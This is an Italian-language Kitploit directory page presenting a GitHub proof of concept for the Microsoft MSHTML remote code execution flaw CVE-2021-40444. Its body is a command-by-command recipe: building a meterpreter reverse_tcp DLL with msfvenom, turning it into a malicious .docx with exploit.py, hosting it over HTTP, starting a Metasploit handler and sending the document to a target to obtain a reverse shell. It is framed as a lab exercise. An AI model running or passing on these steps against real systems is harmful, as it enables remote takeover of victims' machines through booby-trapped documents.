Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-40444-POC — Un tentativo di riprodurre la vulnerabilità Remote Code Execution (RCE) di Microsoft MSHTML e di utilizzare il Metasploit Framework. | Kitploit
Strumenti/GitHubGitHub/kagura-maru/cve-2021-40444-poc
Framework di ExploitGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubkagura-maru/cve-2021-40444-poc

CVE-2021-40444-POC

Un tentativo di riprodurre la vulnerabilità Remote Code Execution (RCE) di Microsoft MSHTML e di utilizzare il Metasploit Framework.

Vedi Repository
10134 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-40444-POC

Un tentativo di riprodurre la vulnerabilità di esecuzione remota di codice (RCE) di Microsoft MSHTML utilizzando Metasploit Framework.

funziona meglio se non eseguito in FlareVM

PREPARAZIONE

Clona il repository da https://github.com/lockedbyte/CVE-2021-40444

Prepara il template .dll da utilizzare successivamente con msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll

Copia il template.dll appena generato nella cartella test/ del repository Dai il permesso di esecuzione al template.dll con chmod +x template.dll

Esegui lo script per elaborare il template.dll in output python3 exploit.py generate ~/test/template.dll http://<SOURCE IP>

LISTENER

Il documento verrà quindi esportato nella cartella out/ e possiamo creare un listener sulla nostra porta HTTP (predefinita: 80) python3 exploit.py host 80

Esegui Metasploit con msfconsole -q use multi/handler set payload windows/meterpreter/reverse_tcp set lhost <SOURCE IP> run

PAYLOAD

Quindi possiamo inviare il document.docx alla nostra macchina vulnerabile ed eseguire il .docx

Otterremo una risposta nel terminale di exploit.py e il lab avrà esito positivo se riusciamo a generare una shell TCP inversa.

Scarica lo strumento